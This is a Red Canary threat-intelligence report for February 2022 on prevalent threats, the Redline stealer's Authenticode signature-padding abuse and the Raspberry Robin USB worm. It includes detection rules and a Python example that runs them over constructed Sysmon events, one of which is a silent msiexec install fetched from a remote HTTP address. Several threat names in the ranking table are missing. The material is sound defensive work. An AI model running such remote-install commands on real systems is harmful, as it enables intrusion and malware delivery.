Each month, the Intel team provides Red Canary customers with an analysis of trending, emerging, or otherwise important threats that we’ve encountered in confirmed threat detections, intelligence reporting, and elsewhere over the preceding month. We call this report our “Intelligence Insights” and plan to share a public version of it with the broader infosec community from here onward.
Highlights
As we’ve done for the past few months, we again looked at the 10 most prevalent threats encountered in the environments that Red Canary monitors. These prevalence rankings are based on the number of unique customer environments in which we observed each threat. Here’s how the numbers shook out for February 2022:
| February rank | Threat name | Percent of customers affected |
|---|---|---|
| ⬆ 1 | SocGholish | 1.8% |
| ⬇ 2 | | 1.5% |
| ⬇ 3 | Impacket | 1.3% |
| ⬆ 4* | | 0.9% |
| ⬆ 4* | Gootkit | 0.9% |
| ⬆ 6 | Coral Crane | 0.7% |
| ⬆ 7 | Remote Utilities | 0.6% |
| 8* | | 0.5% |
| 8* | | 0.5% |
| ⬆ 8* | | 0.5% |
| ⬆ 8* | CypherIT | 0.5% |
| ⬆ 8* | Bundlore | 0.5% |
| ⬆ 8* | Redline | 0.5% |

⬆ = trending up from previous month
⬇ = trending down from previous month
➡ = no change in rank from previous month
*Denotes a tie
Observations on trending threats
SocGholish reclaimed the top spot in February after a brief respite in January, when it dropped to the middle of the pack. Even so, Red Canary did not observe any secondary payloads delivered by SocGholish last month; several of the detections contained multiple script loads typical of discovery activity.
Rounding out the top 10 are several usual suspects—Mimikatz and Impacket remain in the top three, and Emotet and Qbot phishing campaigns continued to haunt inboxes. The activity cluster we recently dubbed “Coral Crane” cracked the top 10, and Raspberry Robin, another new activity cluster, just missed the rankings. You can read more about Raspberry Robin below and about Coral Crane in the February Intelligence Insights.
What are all those squiggly Redlines?
At the bottom of our top 10 list is Redline, a malware-as-a-service information stealer. Red Canary began observing an uptick in Redline activity in February due to a new campaign that abused Google Ads to deliver binaries masquerading as popular Notepad replacements, such as Notepad++ and Sublime Text. In this latest campaign, Redline payloads were delivered from lookalike domains containing misspellings, such as notpaad[.]com and sublimettxt[.]com. The payloads abused a long-known Authenticode verification weakness (the WinVerifyTrust signature padding issue addressed by MS13-098, CVE-2013-3900): extra data appended inside the signature block is not covered by the signed hash, so a tampered binary still appears to carry a valid signature when inspected.
To counter this, Microsoft's guidance is to opt in to strict Authenticode verification by setting the REG_SZ value EnableCertPaddingCheck to "1" under HKLM\SOFTWARE\Microsoft\Cryptography\Wintrust\Config (and under the matching Wow6432Node path on 64-bit systems), after which WinVerifyTrust rejects signatures padded in this way and payloads of this type no longer pass as validly signed. Enabling this setting may break older applications whose signatures rely on such padding, so test it before a broad rollout. Maintaining a strong software management process with centralized distribution of approved applications can prevent well-intentioned users from falling victim to lookalike decoys.
Detection opportunity: Installutil.exe making external network connections
This detection opportunity identifies activity associated with adversary tools that deliver Redline. InstallUtil.exe is the .NET Framework installer utility and has little legitimate reason to reach hosts outside the network, so an external connection from it is worth review on its own.
process == installutil.exe && has_external_netconn == true
New Raspberry Robin activity cluster
As far back as January 2022, we’ve observed an uptick in detections associated with Raspberry Robin, a Red Canary activity cluster involving a worm that spreads via USB drives. This worm may appear as a shortcut (LNK file) masquerading as a legitimate folder on a USB device. Once executed, it can beacon back to a compromised QNAP storage device for command and control.
Since we began tracking this threat only recently, our analysis is ongoing and we don’t yet know the extent of its capabilities. Based on activity we’ve seen so far, organizations that rely on USB devices should be aware of this threat.
Detection opportunity: msiexec contacting a remote host over HTTP
This detection opportunity identifies the Windows Installer tool, msiexec.exe, contacting a remote host over HTTP. Raspberry Robin uses this technique during its infection process, and this opportunity will also catch other threats that perform similar actions. Note that msiexec can legitimately install a package straight from a URL (msiexec /i http://...), so some software deployment tooling will match; tune on the destination rather than suppressing the logic outright.
process == msiexec.exe && process_command_line_includes == (http://, https://)
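As an added example that is not Red Canary's code or detection engine, here is the logic of both detection opportunities above (InstallUtil.exe with an external network connection, and msiexec.exe with a URL on its command line) written in Python and run over a handful of constructed Sysmon-style events. The field names, the definition of "external" as anything outside RFC 1918, loopback and link-local space, and every sample record are assumptions of this example; the addresses come from the 203.0.113.0/24 documentation range.

```python
"""
Added example (not Red Canary's code): the two detection opportunities from
this page, run over constructed Sysmon-style events so the logic can be
exercised offline. Field names, the notion of "external", and all sample
records below are assumptions made for this example.
"""
import ipaddress
import ntpath
import re

# Assumption: "external" means outside RFC 1918 space, loopback and link-local,
# which is how EDR telemetry commonly defines it. Documentation-range
# addresses such as 203.0.113.x therefore count as external here.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16",
)]

# Constructed events: event_id 1 = process create, 3 = network connection
# (Sysmon numbering). None of these records come from real telemetry.
SAMPLE_EVENTS = [
    {"event_id": 1, "pid": 1001,
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe",
     "command_line": r"InstallUtil.exe /logfile= /LogToConsole=false C:\Users\Public\npp.8.2.Installer.exe"},
    {"event_id": 3, "pid": 1001,                       # external destination: alert
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe",
     "dest_ip": "203.0.113.10", "dest_port": 443},
    {"event_id": 3, "pid": 1003,                       # internal destination: no alert
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
     "dest_ip": "10.20.30.40", "dest_port": 8080},
    {"event_id": 1, "pid": 1002,                       # URL on the command line: alert
     "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": r"msiexec.exe /q /i HTTP://203.0.113.25/x.msi"},
    {"event_id": 1, "pid": 1004,                       # local package: no alert
     "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": r"msiexec.exe /i C:\Windows\Temp\agent.msi /qn"},
]


def is_external(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def image_name(path: str) -> str:
    # Match on the basename, case-insensitively: the 32- and 64-bit .NET
    # Framework directories both carry InstallUtil.exe.
    return ntpath.basename(path).lower()


def detect_installutil_external(events):
    """process == installutil.exe && has_external_netconn == true"""
    alerts, seen = [], set()
    for ev in events:
        if (ev["event_id"] == 3
                and image_name(ev["image"]) == "installutil.exe"
                and is_external(ev["dest_ip"])
                and ev["pid"] not in seen):
            seen.add(ev["pid"])            # one alert per process, not per socket
            alerts.append({"rule": "installutil_external_netconn",
                           "pid": ev["pid"],
                           "dest": f"{ev['dest_ip']}:{ev['dest_port']}"})
    return alerts


# Case-insensitive: the Windows Installer accepts HTTP:// as readily as http://.
URL_IN_CMDLINE = re.compile(r"https?://", re.IGNORECASE)


def detect_msiexec_http(events):
    """process == msiexec.exe && process_command_line_includes == (http://, https://)"""
    return [
        {"rule": "msiexec_http_cmdline", "pid": ev["pid"],
         "command_line": ev["command_line"]}
        for ev in events
        if ev["event_id"] == 1
        and image_name(ev["image"]) == "msiexec.exe"
        and URL_IN_CMDLINE.search(ev["command_line"])
    ]


def run_detections(events):
    return detect_installutil_external(events) + detect_msiexec_http(events)


if __name__ == "__main__":
    for alert in run_detections(SAMPLE_EVENTS):
        print(alert)
```

Run stand-alone, the script emits one alert for each rule: the InstallUtil process that reached 203.0.113.10:443 and the msiexec process that fetched its package over HTTP, while the InstallUtil connection to an internal 10.x address and the local-package msiexec run stay quiet. Real telemetry should correlate network events to processes by a process GUID rather than a reusable PID, and the msiexec hit still needs the destination checked against your known software distribution hosts before it is treated as malicious.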